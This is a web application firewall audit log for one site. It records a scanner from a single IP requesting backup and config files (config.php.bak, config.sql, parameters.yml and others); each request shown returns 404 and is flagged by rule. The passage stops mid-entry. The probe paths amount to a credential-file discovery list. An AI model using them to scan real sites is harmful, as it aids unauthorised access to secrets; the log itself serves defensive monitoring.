[tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.dat"] [unique_id "aE3UPZf90d3VSj3QpDNzewAAAAQ"] Stopwatch: 1749931069181111 3107 (- - -) Stopwatch2: 1749931069181111 3107; combined=1826, p1=318, p2=1452, p3=0, p4=0, p5=55, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1dcf8026-Z-- --0d65d06d-A-- [15/Jun/2025:01:27:49.299547 +0530] aE3UPZOn_2b0s5j3TtOJlwAAAAY 185.177.72.108 49616 127.0.0.1 7081 --0d65d06d-B-- GET /config.inc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0d65d06d-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0d65d06d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.inc"] [unique_id "aE3UPZOn_2b0s5j3TtOJlwAAAAY"] Stopwatch: 1749931069296210 3391 (- - -) Stopwatch2: 1749931069296210 3391; combined=2018, p1=356, p2=1604, p3=0, p4=0, p5=58, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d65d06d-Z-- --00ba3f45-A-- [15/Jun/2025:01:27:49.414760 +0530] aE3UPUMAAEyWrtlsmo2MuQAAAAc 185.177.72.108 43484 127.0.0.1 7081 --00ba3f45-B-- GET /config.inc.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --00ba3f45-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --00ba3f45-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.inc.bak"] [unique_id "aE3UPUMAAEyWrtlsmo2MuQAAAAc"] Stopwatch: 1749931069411526 3287 (- - -) Stopwatch2: 1749931069411526 3287; combined=1925, p1=332, p2=1533, p3=0, p4=0, p5=59, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --00ba3f45-Z-- --c0219f75-A-- [15/Jun/2025:01:27:49.543210 +0530] aE3UPek-MTQZUjwklQN1HAAAAAg 185.177.72.108 43498 127.0.0.1 7081 --c0219f75-B-- GET /config.inc.old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c0219f75-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c0219f75-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.inc.old"] [unique_id "aE3UPek-MTQZUjwklQN1HAAAAAg"] Stopwatch: 1749931069540027 3244 (- - -) Stopwatch2: 1749931069540027 3244; combined=1928, p1=335, p2=1498, p3=0, p4=0, p5=94, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0219f75-Z-- --2f0ae068-A-- [15/Jun/2025:01:27:50.442638 +0530] aE3UPuh_Rdu0duNoj2H4gAAAAAo 185.177.72.108 43570 127.0.0.1 7081 --2f0ae068-B-- GET /config.ini HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2f0ae068-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2f0ae068-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.ini"] [unique_id "aE3UPuh_Rdu0duNoj2H4gAAAAAo"] Stopwatch: 1749931070439640 3049 (- - -) Stopwatch2: 1749931070439640 3049; combined=1709, p1=344, p2=1309, p3=0, p4=0, p5=56, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2f0ae068-Z-- --b262e932-A-- [15/Jun/2025:01:27:50.557558 +0530] aE3UPjV1wc8MD9ZPjDFaDwAAAAM 185.177.72.108 43590 127.0.0.1 7081 --b262e932-B-- GET /config.ini.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b262e932-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b262e932-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.ini.bak"] [unique_id "aE3UPjV1wc8MD9ZPjDFaDwAAAAM"] Stopwatch: 1749931070554300 3311 (- - -) Stopwatch2: 1749931070554300 3311; combined=1991, p1=338, p2=1592, p3=0, p4=0, p5=61, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b262e932-Z-- --be981a08-A-- [15/Jun/2025:01:27:50.672793 +0530] aE3UPlj2r5sYBjRDYxhz6gAAAAU 185.177.72.108 43598 127.0.0.1 7081 --be981a08-B-- GET /config.ini.old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --be981a08-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --be981a08-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.ini.old"] [unique_id "aE3UPlj2r5sYBjRDYxhz6gAAAAU"] Stopwatch: 1749931070669510 3372 (- - -) Stopwatch2: 1749931070669510 3372; combined=1989, p1=394, p2=1521, p3=0, p4=0, p5=74, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --be981a08-Z-- --9bc5542e-A-- [15/Jun/2025:01:27:51.246580 +0530] aE3UP-h_Rdu0duNoj2H4gQAAAAo 185.177.72.108 43658 127.0.0.1 7081 --9bc5542e-B-- GET /config.old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9bc5542e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --9bc5542e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.old"] [unique_id "aE3UP-h_Rdu0duNoj2H4gQAAAAo"] Stopwatch: 1749931071243291 3342 (- - -) Stopwatch2: 1749931071243291 3342; combined=1911, p1=335, p2=1518, p3=0, p4=0, p5=57, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9bc5542e-Z-- --d06d4940-A-- [15/Jun/2025:01:27:51.788621 +0530] aE3UP6lFM0RY285MG1CITAAAAAk 185.177.72.108 43708 127.0.0.1 7081 --d06d4940-B-- GET /config.php.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d06d4940-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d06d4940-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.php.bak"] [unique_id "aE3UP6lFM0RY285MG1CITAAAAAk"] Stopwatch: 1749931071785527 3146 (- - -) Stopwatch2: 1749931071785527 3146; combined=1867, p1=316, p2=1496, p3=0, p4=0, p5=55, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d06d4940-Z-- --0cd9074e-A-- [15/Jun/2025:01:27:52.019447 +0530] aE3UQDV1wc8MD9ZPjDFaEQAAAAM 185.177.72.108 43726 127.0.0.1 7081 --0cd9074e-B-- GET /config.php.inc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0cd9074e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0cd9074e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.php.inc"] [unique_id "aE3UQDV1wc8MD9ZPjDFaEQAAAAM"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/config.php.inc' not found or unable to stat Stopwatch: 1749931072015295 4229 (- - -) Stopwatch2: 1749931072015295 4229; combined=2347, p1=408, p2=1858, p3=0, p4=0, p5=81, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0cd9074e-Z-- --75cdfe05-A-- [15/Jun/2025:01:27:52.252622 +0530] aE3UQKlFM0RY285MG1CITQAAAAk 185.177.72.108 43770 127.0.0.1 7081 --75cdfe05-B-- GET /config.php.old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --75cdfe05-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --75cdfe05-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.php.old"] [unique_id "aE3UQKlFM0RY285MG1CITQAAAAk"] Stopwatch: 1749931072249590 3086 (- - -) Stopwatch2: 1749931072249590 3086; combined=1819, p1=315, p2=1445, p3=0, p4=0, p5=59, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --75cdfe05-Z-- --2fd72e16-A-- [15/Jun/2025:01:27:53.075585 +0530] aE3UQZOn_2b0s5j3TtOJnAAAAAY 185.177.72.108 43880 127.0.0.1 7081 --2fd72e16-B-- GET /config.sql HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2fd72e16-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2fd72e16-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.sql"] [unique_id "aE3UQZOn_2b0s5j3TtOJnAAAAAY"] Stopwatch: 1749931073072596 3040 (- - -) Stopwatch2: 1749931073072596 3040; combined=1597, p1=334, p2=1204, p3=0, p4=0, p5=59, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2fd72e16-Z-- --96ffca15-A-- [15/Jun/2025:01:27:54.056594 +0530] aE3UQkMAAEyWrtlsmo2MvwAAAAc 185.177.72.108 43982 127.0.0.1 7081 --96ffca15-B-- GET /config.properties.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --96ffca15-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --96ffca15-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.properties.bak"] [unique_id "aE3UQkMAAEyWrtlsmo2MvwAAAAc"] Stopwatch: 1749931074053766 2880 (- - -) Stopwatch2: 1749931074053766 2880; combined=1612, p1=316, p2=1241, p3=0, p4=0, p5=55, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96ffca15-Z-- --a55b6b44-A-- [15/Jun/2025:01:27:58.964053 +0530] aE3URkMAAEyWrtlsmo2MxAAAAAc 185.177.72.108 44386 127.0.0.1 7081 --a55b6b44-B-- GET /app.config HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a55b6b44-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a55b6b44-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/app.config"] [unique_id "aE3URkMAAEyWrtlsmo2MxAAAAAc"] Stopwatch: 1749931078961222 2883 (- - -) Stopwatch2: 1749931078961222 2883; combined=1631, p1=320, p2=1257, p3=0, p4=0, p5=54, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a55b6b44-Z-- --59241929-A-- [15/Jun/2025:01:28:00.068071 +0530] aE3USJOn_2b0s5j3TtOJogAAAAY 185.177.72.108 57296 127.0.0.1 7081 --59241929-B-- GET /app/config/parameters.ini HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --59241929-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --59241929-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/app/config/parameters.ini"] [unique_id "aE3USJOn_2b0s5j3TtOJogAAAAY"] Stopwatch: 1749931080064836 3289 (- - -) Stopwatch2: 1749931080064836 3289; combined=1944, p1=361, p2=1521, p3=0, p4=0, p5=62, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --59241929-Z-- --d9bff828-A-- [15/Jun/2025:01:28:00.184963 +0530] aE3USDV1wc8MD9ZPjDFaGgAAAAM 185.177.72.108 57318 127.0.0.1 7081 --d9bff828-B-- GET /app/config/parameters.yml HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d9bff828-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d9bff828-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] 